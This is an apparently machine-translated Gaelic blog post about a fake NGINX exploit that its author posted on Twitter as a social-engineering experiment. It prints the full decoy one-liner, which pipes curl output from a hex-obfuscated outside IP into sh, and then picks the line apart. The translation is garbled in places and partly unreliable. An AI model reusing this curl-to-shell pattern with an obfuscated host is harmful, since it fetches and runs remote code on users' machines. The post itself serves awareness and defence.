Soirbheachas deuchainn sòisealta le brath nginx meallta

Thoir an aire. eadar-theangachadh.: ùghdar cho-dhùin nota tùsail, a chaidh fhoillseachadh air 1 Ògmhios, deuchainn a dhèanamh am measg an fheadhainn aig a bheil ùidh ann an tèarainteachd fiosrachaidh. Gus seo a dhèanamh, dh’ ullaich e brath meallta airson so-leòntachd nach deach fhoillseachadh air an t-seirbheisiche lìn agus chuir e air a Twitter e. Na barailean aige - a bhith air am foillseachadh sa bhad le eòlaichean a chitheadh ​​​​am mealladh follaiseach sa chòd - chan e a-mhàin nach tàinig iad gu buil ... Chaidh iad thairis air a h-uile dùil, agus an taobh eile: fhuair an tweet taic mhòr bho ghrunn dhaoine nach do rinn thoir sùil air na tha ann.

TL; DR: Na cleachd pìoban faidhle ann an sh no bash ann an suidheachadh sam bith. Is e dòigh mhath a tha seo airson smachd a chall air a’ choimpiutair agad.

Tha mi airson sgeulachd ghoirid a cho-roinn riut mu dheidhinn brath PoC èibhinn a chaidh a chruthachadh air 31 Cèitean. Nochd e gu sgiobalta mar fhreagairt do naidheachdan bho Alisa Esage Shevchenko, ball Iomairt Latha Zero (ZDI), gum bi fiosrachadh mu dheidhinn so-leòntachd ann an NGINX a’ leantainn gu RCE (cur an gnìomh còd iomallach) air fhoillseachadh a dh’ aithghearr. Leis gu bheil cumhachd aig NGINX mòran làraich-lìn, feumaidh gur e spreadhadh a bh’ anns an naidheachd. Ach mar thoradh air dàil sa phròiseas “foillseachadh cunntachail”, cha robh fios air mion-fhiosrachadh na thachair - is e seo modh àbhaisteach ZDI.

tuiteadh mu fhoillseachadh so-leòntachd ann an NGINX

Às deidh dhomh crìoch a chuir air obair air dòigh obfuscation ùr ann an curl, thug mi iomradh air an tweet tùsail agus “leig mi a-mach PoC obrach" anns an robh aon loidhne de chòd a tha, a rèir coltais, a’ gabhail brath air an so-leòntachd a chaidh a lorg. Gu dearbh, b 'e neòlas iomlan a bha seo. Bha mi a’ gabhail ris gum bithinn fosgailte sa bhad, agus gum faigheadh ​​​​mi retweets no dhà (oh uill).

tuiteadh le brath meallta

Ach, cha b’ urrainn dhomh smaoineachadh dè thachair an ath rud. Bha fèill mhòr air an tweet agam. Gu iongantach, aig an àm seo (15:00 àm Moscow 1 Ògmhios) chan eil mòran dhaoine air faighinn a-mach gur e meallta a tha seo. Bidh mòran dhaoine ga ath-sgrìobhadh gun a bhith ga sgrùdadh idir (gun luaidh air a bhith a’ coimhead air na grafaigean àlainn ASCII a bheir e a-mach).

Dìreach seall cho breagha sa tha e!

Ged a tha na lùban agus na dathan sin uile sgoinneil, tha e soilleir gum feumadh daoine còd a ruith air an inneal aca airson am faicinn. Gu fortanach, bidh brobhsairean ag obair san aon dòigh, agus còmhla ris an fhìrinn nach robh mi dha-rìribh ag iarraidh a dhol a-steach do dhuilgheadas laghail, bha an còd a chaidh a thiodhlacadh air an làrach agam dìreach a’ dèanamh gairmean mac-talla gun a bhith a’ feuchainn ri còd a bharrachd a chuir a-steach no a chuir an gnìomh.

Sgaradh beag: lìonta, dnz, mise agus na balaich eile bhon sgioba Thug sluagh Tha sinn air a bhith a’ cluich le diofar dhòighean air òrdughan curl a sheachnadh airson greis a-nis oir tha e fionnar ... agus tha sinn geeks. lorg netspooky agus dnz grunn dhòighean ùra a bha coltas gu math gealltanach dhomh. Chaidh mi a-steach don spòrs agus dh’ fheuch mi ri atharrachaidhean deicheach IP a chuir ris a’ bhaga de chleasan. Tha e a ’tionndadh a-mach gum faodar IP a thionndadh gu cruth hexadecimal cuideachd. A bharrachd air an sin, bidh curl agus a ’mhòr-chuid de dh’ innealan NIX eile gu toilichte ag ithe IPan hexadecimal! Mar sin cha robh ann ach loidhne-àithne a bha cinnteach agus tèarainte a chruthachadh. Mu dheireadh shocraich mi air an fhear seo:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Innleadaireachd sòisio-dealanach (SEE) - barrachd air dìreach phishing

Bha sàbhailteachd agus eòlas na phrìomh phàirt den deuchainn seo. Tha mi a’ smaoineachadh gur iad sin a thug air a shoirbheachadh. Bha an loidhne-àithne gu soilleir a’ ciallachadh tèarainteachd le bhith a’ toirt iomradh air “127.0.0.1” (an localhost ainmeil). Thathas den bheachd gu bheil Localhost tèarainte agus cha bhith an dàta air a ’fàgail do choimpiutair gu bràth.

B’ e eòlas an dàrna prìomh phàirt SEE den deuchainn. Leis gu robh an luchd-èisteachd cuimsichte gu sònraichte a’ toirt a-steach daoine a bha eòlach air bunaitean tèarainteachd coimpiutair, bha e cudromach còd a chruthachadh gus am biodh e coltach gu robh pàirtean dheth eòlach agus eòlach (agus mar sin sàbhailte). Tha e air leth soirbheachail a bhith ag iasad eileamaidean de sheann bhun-bheachdan brathaidh agus gan cur còmhla ann an dòigh neo-àbhaisteach.

Gu h-ìosal tha mion-sgrùdadh mionaideach air an aon-loidhne. Bidh a h-uile dad air an liosta seo a’ caitheamh nàdar cosmaigeach, agus cha mhòr nach eil feum air dad airson a ghnìomhachd fhèin.

Dè na co-phàirtean a tha dha-rìribh riatanach? Seo -gsS, -O 0x0238f06a, |sh agus am frithealaiche lìn fhèin. Cha robh stiùireadh droch-rùnach sam bith air an fhrithealaiche lìn, ach dìreach thug e seirbheis do ghrafaigean ASCII a’ cleachdadh òrdughan echo anns an sgriobtar a tha ann an index.html. Nuair a chuir an neach-cleachdaidh a-steach loidhne le |sh anns a 'mheadhan, index.html air a luchdachadh agus air a chuir gu bàs. Gu fortanach, cha robh droch rùn aig luchd-gleidhidh an fhrithealaiche lìn.

• ../../../%00 - a 'riochdachadh a' dol seachad air an eòlaire;
• ngx_stream_module.so - slighe gu modal NGINX air thuaiream;
• /bin/sh%00<'protocol:TCP' - tha còir againn a chuir air bhog /bin/sh air an inneal targaid agus ath-stiùireadh an toradh chun t-sianal TCP;
• -O 0x0238f06a#PLToffset - tàthchuid dìomhair, air a chur ris #PLToffset, a bhith a’ coimhead mar chothromachadh cuimhne ann an dòigh air choireigin anns a’ PLT;
• |sh; - criomag chudromach eile. Dh'fheumadh sinn an toradh ath-stiùireadh gu sh / bash gus an còd a chuir an gnìomh a thàinig bhon t-seirbheisiche lìn ionnsaigh a tha suidhichte aig 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - dummy anns a bheil netcat a 'toirt iomradh /dev/tcp/localhostgus am bi a h-uile dad a’ coimhead sàbhailte a-rithist. Gu dearbh, chan eil e a 'dèanamh dad agus tha e air a ghabhail a-steach san loidhne airson bòidhchead.

Tha seo a’ crìochnachadh dì-chòdachadh an sgriobt aon-loidhne agus an deasbad air taobhan de “innleadaireachd sòisio-dealanach” (phishing toinnte).

Rèiteachadh frithealaiche lìn agus frith-bheartan

Leis gur e infosec/hackers a th’ anns a’ mhòr-chuid de na fo-sgrìobhaichean agam, chuir mi romham am frithealaiche lìn a dhèanamh beagan nas seasmhaiche ri abairtean de “ùidh” às an leth, dìreach gus am biodh rudeigin aig na balaich ri dhèanamh (agus bhiodh e spòrsail Suidhich). Chan eil mi a’ dol a liostadh na duilgheadasan gu lèir an seo leis gu bheil an deuchainn fhathast a ’dol, ach seo beagan rudan a bhios am frithealaiche a’ dèanamh:

• A’ cumail sùil ghnìomhach air oidhirpean cuairteachaidh air lìonraidhean sòisealta sònraichte agus a’ cur grunn òrdagan ro-shealladh an àite gus an neach-cleachdaidh a bhrosnachadh gus cliogadh air a’ cheangal.
• Ag ath-stiùireadh Chrome/Mozilla/Safari/etc gu bhidio brosnachaidh Thugcrowd an àite a bhith a’ sealltainn an sgriobt shligean.
• Freiceadan airson comharran FOILLSEACHADH de shàrachadh / sgrùdadh soilleir, agus an uairsin a’ tòiseachadh ag ath-stiùireadh iarrtasan gu frithealaichean NSA (ha!).
• A ’stàladh Trojan, a bharrachd air rootkit BIOS, air a h-uile coimpiutair a bhios an luchd-cleachdaidh a’ tadhal air an òstair bho bhrobhsair àbhaisteach (dìreach a ’magadh!).

Pàirt bheag de antimers

Anns a 'chùis seo, b' e an aon amas a bh 'agam a bhith a' maighstireachd cuid de fheartan Apache - gu sònraichte, na riaghailtean fionnar airson ath-stiùireadh iarrtasan - agus smaoinich mi: carson?

Cleachd NGINX (fìor!)

Subscribe to @alisaesage air Twitter agus lean obair mhòr ZDI ann a bhith a’ dèiligeadh ri fìor chugallachd agus a’ gabhail brath air cothroman ann an NGINX. Tha an obair aca air a bhith air mo mhealladh a-riamh agus tha mi taingeil do Alice airson a foighidinn leis a h-uile iomradh agus fios a dh’ adhbhraich an tweet gòrach agam. Gu fortanach, rinn e beagan math cuideachd: chuidich e le bhith ag àrdachadh mothachadh mu chugallachd NGINX, a bharrachd air duilgheadasan air adhbhrachadh le mì-ghnàthachadh curl.

Source: www.habr.com